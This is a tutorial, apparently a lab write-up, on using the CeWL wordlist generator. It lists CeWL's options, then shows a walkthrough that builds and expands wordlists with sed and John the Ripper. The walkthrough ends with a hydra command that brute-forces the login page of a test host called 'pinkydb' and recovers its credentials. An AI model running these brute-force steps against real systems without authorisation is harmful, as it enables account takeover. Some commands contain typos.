Cewl is a wordlist generator written in Ruby language, it spiders a given URL to a specified depth. It returns a list of words which can then be used for password crackers such as John the Ripper.


It comes installed in most security OS

How to use

1. Display help

-h, –help = Displays help menu

  • cewl –help

2. Default method

Uses default depth for wordlist creation

  • cewl

3. Save the results to a file

-w = write to a file

  • cewl -w results.txt
  • ls -l results.txt
  • wc -l results.txt

We got 5220 words

4. Generate wordlists of specific length of words

-m 9 = minimum 9 characters

  • cewl -m 10

5. Gather only email addresses

-n = no words

-e = find email

  • cewl -n -e

6. Count the number of words repeated in the website, it also orders it by number of occurrences

-c = word count

  • cewl -c

7. Scanning using a higher depth, takes longer for a result

-d 3 = Depth to spider to, default 2

  • cewl -d 4 -w results.txt
  • ls -l results.txt
  • wc -l results.txt

This time we got more words by increasing the depth level

8. Debugging the results, also, shows the content of the results (errors, raw details)

–debug = Enable debugging

  • cewl –debug

9. Enabling verbosity, retrieving completed detail and results of a website

-v = enable verbosity

  • cewl -v

10. Generate alpha-numeric results, by default without this option the script only prints letters

–with-numbers = Accept words with numbers in as well as just letters

  • cewl –with-numbers

11. Print all as lowercase

–lowercase: Lowercase all parsed words

  • cewl –lowercase

12. Print metadata

-a, –meta: include meta data.

  • cewl -a


1. If there is any authentication we need to log in to proceed to the site to generate the wordlist

–auth_type: Digest or basic.

–auth_user: Authentication username.

–auth_pass: Authentication password.

  • cewl –auth_type basic –auth_user admin –auth_pass password -v

Proxy Support

1. Send the requests through a proxy

–proxy_host: Proxy host.

–proxy_port: Proxy port, default 8080.

  • cewl –proxy_host –proxy_port 8080

In Burp suite, we can see the requests

2. Spoof User-Agent

-u, –ua <agent>: User agent to send.

  • cewl –proxy_host –proxy_port 8080 -u “Mozilla/5.0 (iPhone; CPU iPhone OS 12_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1”

In BurpSuite we can see the User-Agent spoofed



Create a wordlist with CEWL, develop a more sophisticated list with JTR, and attack a web login page with hydra

1. Use cewl to create the worklist

  • crewl pinkydb > wordlist1.txt
  • cat wordlist1.txt | wc -l

2. Use sed to make all words, lowercase, uppercase

  • cat wordlist1.txt > wordlist2.txt; sed -e ‘s/.*/\L&/’ wordlist1.txt >> wordlist2.txt ; sed -e ‘s/.*/\U&/’ wordlist2.txt >> wordlist2.txt
  • cat wordlist2.txt | wc -l

3. (OPTIONAL) having cewl results you could generate a wordlist using JTR (John)

  • john –rules –stdout –wordlist=wordlist1.txt > jtr_wordlist.txt
  • cat jtr_wordlist.txt | wc -l

4. Now, use Hydra to test each of the passwords, already having a username. In This case I have ‘pinky’ & ‘pink1337’. In this case, I have a login page at http://pinkydb:7654/login.php

  • hydra -L users -P wordlist2.txt pinkydb -s 7654 http-post-form “/login.php:user=^USER^&pass=^PASS^:Invalid Username or Password”

Note, we found a match username: pinky & password: Passione, the other result seems to be a false positive.

5. Try to log in using the credentials

  • pinky
  • Passione

6. Successful log in